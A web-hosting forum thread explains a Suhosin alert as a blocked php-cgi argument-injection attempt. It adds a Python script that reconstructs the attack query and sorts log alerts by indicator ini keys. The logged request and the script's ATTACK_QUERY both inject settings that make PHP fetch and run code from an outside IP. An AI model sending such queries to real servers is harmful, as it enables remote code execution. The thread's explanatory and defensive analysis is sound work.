suhosin - user.log

  • Hi,

    I found this in my user.log

    <time> <myserver> suhosin[17870]: ALERT - configured request variable name length limit exceeded - dropped variable '-d_allow_url_include=On_-d_auto_prepend_file=http://109_68_72_95/icons/api_gif_-n/?-d_allow_url_include=On_-d_auto_prepend_file=http://109_68_72_95/icons/api_gif_-n' (attacker '', file '/var/www/imscp/gui/public/index.php')

    anyone could explain, what happened here?

    OS: debian GNU/Linux Squeeze
    PHP 5.3.3-7+squeeze9 with Suhosin-Patch (cli) (built: May 8 2012 10:41:34)


  • Hello Tom

    I think your var-name is too long. Please check these settings:

    in the suhosin.ini file.

    The default value is 64, I think. Change it to the value you need.


  • Just a note: Suhosin won't be supported in Debian Wheezy and is removed from the default install.

  • Anyway, this has a very easy explanation: a hacker tried to exploit a recently discovered PHP bug that applies when PHP runs as a CGI application.

    If your server had been using an older (unpatched) PHP release, and it had been running in CGI mode, the result would have been your server downloading the contents of an external file and executing it as if it were part of your website.

    However, the URL the hacker constructed for the attack was too long for PHP's Suhosin query length limit, so it stopped the request and logged the error.

    Anyway, even if you did not have Suhosin enabled, that would not have been a problem, for two reasons:

    (1) Debian's included PHP was patched as soon as the PHP guys released a fix for this bug. If you keep your system up to date, PHP simply doesn't contain this bug anymore.
    (2) The bug only works when PHP is run as CGI. In i-MSCP you can choose to run PHP in FastCGI mode (with mod_fcgid or mod_fastcgi) or in embedded mode (with mod_php), but not in CGI mode. This decision was made purely for performance reasons (PHP as CGI is SLOW because a separate PHP interpreter has to be executed for each request).
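The two replies above describe two separate mechanisms, and the script below, an added example that is not part of this thread and not code from Suhosin or i-MSCP, walks through both on constructed input. First, how a CGI gateway turns a query string with no literal "=" into command-line arguments (RFC 3875 section 4.4), which is what php-cgi releases before the May 2012 fixes (CVE-2012-1823) then honoured as their own -d ini overrides; second, how PHP builds the $_GET key for that same request (URL-decoding, then mangling "." and " " into "_", which is why the IP appears as 109_68_72_95 in the log), so that the key ends up far above the 64-character limit the second reply mentions and Suhosin drops it. The final part parses Suhosin alert lines and separates this attack residue from an ordinary over-long field name. Assumptions: the sample log lines are constructed (the first is modelled on the one quoted in the first post, with the attack query appearing once), the raw attack query is my reconstruction, the server runs with Suhosin's default limit of 64, and the indicator list is my own choice.

```python
import re
from urllib.parse import unquote, unquote_plus

# Suhosin's per-variable name length limit. 64 is the default the second
# reply mentions; assumption: the server in the thread ran with that default.
SUHOSIN_MAX_VARNAME_LENGTH = 64

# Constructed sample log lines. The first is modelled on the alert quoted in
# the first post; the second is a made-up benign alert for comparison.
SAMPLE_LOG = """\
May 12 03:14:07 myserver suhosin[17870]: ALERT - configured request variable name length limit exceeded - dropped variable '-d_allow_url_include=On_-d_auto_prepend_file=http://109_68_72_95/icons/api_gif_-n' (attacker '', file '/var/www/imscp/gui/public/index.php')
May 12 03:15:00 myserver suhosin[17871]: ALERT - configured request variable name length limit exceeded - dropped variable 'a_perfectly_harmless_but_rather_long_form_field_name_from_the_application' (attacker '', file '/var/www/imscp/gui/public/index.php')
"""

# Constructed: the raw query string an attacker sends for the php-cgi
# argument-injection bug (CVE-2012-1823). There is no literal '=' in it;
# the '=' signs are encoded as %3d and the spaces as '+'.
ATTACK_QUERY = ("-d+allow_url_include%3dOn"
                "+-d+auto_prepend_file%3dhttp://109.68.72.95/icons/api.gif+-n")


def cgi_argv(raw_query):
    """RFC 3875 section 4.4: a query string with no unencoded '=' is an
    'indexed' query, and the gateway splits it on '+' and URL-decodes each
    word into argv for the script. Unpatched php-cgi then parsed those words
    as its own command-line options."""
    if "=" in raw_query:
        return []
    return [unquote(word) for word in raw_query.split("+")]


def php_ini_overrides(argv):
    """Collect the key=value pairs passed through php-cgi's -d switch."""
    overrides = {}
    words = iter(argv)
    for word in words:
        if word == "-d":
            arg = next(words, "")
        elif word.startswith("-d"):
            arg = word[2:]
        else:
            continue
        key, _, value = arg.partition("=")
        if key:
            overrides[key] = value
    return overrides


def php_get_var_name(raw_query):
    """How PHP turns the same query into a $_GET key: split on '&', take the
    part before the first literal '=', URL-decode it (so %3d becomes '=' and
    '+' becomes a space), then apply PHP's variable-name mangling, which
    drops leading spaces and turns '.' and ' ' into '_'."""
    first_pair = raw_query.split("&", 1)[0]
    name = unquote_plus(first_pair.split("=", 1)[0])
    return name.lstrip(" ").replace(".", "_").replace(" ", "_")


ALERT_RE = re.compile(
    r"suhosin\[(?P<pid>\d+)\]: ALERT - (?P<reason>.+?) - dropped variable "
    r"'(?P<name>[^']*)' \(attacker '(?P<attacker>[^']*)', file '(?P<file>[^']*)'\)"
)

# ini settings that, when injected via -d, turn a request into code execution
# or strip protections. Assumption: this list is my own, not Suhosin's.
INJECTION_INDICATORS = ("allow_url_include", "auto_prepend_file",
                        "auto_append_file", "disable_functions",
                        "open_basedir", "safe_mode")


def classify_alert(line):
    """Parse one Suhosin alert and decide whether the dropped name is the
    residue of a php-cgi argument injection or just a long field name."""
    m = ALERT_RE.search(line)
    if m is None:
        return None
    rec = m.groupdict()
    rec["pid"] = int(rec["pid"])
    rec["name_length"] = len(rec["name"])
    rec["over_limit"] = rec["name_length"] > SUHOSIN_MAX_VARNAME_LENGTH
    # After mangling, the name still begins with an option switch and carries
    # the ini keys; a form field name from a web application never does.
    hits = [k for k in INJECTION_INDICATORS if k + "=" in rec["name"]]
    rec["indicators"] = hits
    if rec["name"].startswith("-") and hits:
        rec["verdict"] = "php-cgi argument injection attempt"
    else:
        rec["verdict"] = "long variable name, no injection indicator"
    return rec


def scan_log(text):
    """Classify every Suhosin alert found in a chunk of syslog text."""
    return [r for r in (classify_alert(l) for l in text.splitlines()) if r]


if __name__ == "__main__":
    argv = cgi_argv(ATTACK_QUERY)
    print("php-cgi would have seen argv:", argv)
    print("ini overrides injected:", php_ini_overrides(argv))
    name = php_get_var_name(ATTACK_QUERY)
    print("PHP's $_GET key for it: %r (%d chars, limit %d)"
          % (name, len(name), SUHOSIN_MAX_VARNAME_LENGTH))
    for rec in scan_log(SAMPLE_LOG):
        print(rec["pid"], rec["name_length"], rec["verdict"], rec["indicators"])
```

Run it as a script to see the reconstructed argv, the injected ini overrides and the 81-character $_GET key next to the 64-character limit; point scan_log() at a real user.log to triage alerts in bulk. Note that the first post's logged name is even longer because the scanner appended the same payload twice, which the classifier handles the same way since it only looks for the leading switch and the ini keys.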